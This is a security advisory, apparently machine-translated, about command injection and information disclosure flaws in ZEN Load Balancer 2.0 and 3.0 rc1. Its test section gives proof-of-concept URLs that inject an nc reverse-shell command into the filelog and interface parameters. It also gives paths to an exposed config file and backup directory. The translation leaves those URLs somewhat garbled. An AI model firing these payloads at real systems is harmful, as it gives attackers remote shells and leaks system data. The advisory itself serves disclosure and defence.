Release date:
Updated on:
Affected Systems:
ZEN Load Balancer 3.0 rc1
ZEN Load Balancer 2.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55638
Zen Load Balancer is a device that creates a TCP Load Balancing Based On Debian.
ZEN Load Balancer 2.0 and 3.0 rc1 have security vulnerabilities. Attackers can exploit these vulnerabilities to execute arbitrary commands and upload arbitrary files to affected computers or leak sensitive information.
1) The application does not properly restrict access to the config/global. conf file, which may expose certain system information.
2) If the application does not properly restrict access to the backup directory, it can be used to list and download any backup and disclose system information.
<* Source: Brendan Coles
Link: http://secunia.com/advisories/50690/
Http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/index.cgi? Id = 2-2 & amp; filelog = % 26nc + 192.168.1.1 + 4444 +-e
+/Bin/bash; & amp; nlines = 1 & amp; action = See + logs
Http://www.example.com/index.cgi? Id = 2-2 & amp; filelog = # & amp; nlines = 1% 26nc + 192.168.1.1 + 4444 +-e
+/Bin/bash; & amp; action = See + logs
Http://www.example.com/index.cgi? Id = 3-2 & amp; if = lo % 26nc + 192.168.1.1 + 4444 +-e +/bin/bash
% 26 & amp; status = up & amp; newip = 0.0.0.0 & amp; netmask = 255.255.255.0 & amp; gwaddr = & amp; action = Save +
% 26 + Up!
Http://www.example.com/config/global.conf
Http://www.example.com/backup/
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
ZEN Load Balancer
-----------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Www.zenloadbalancer.com/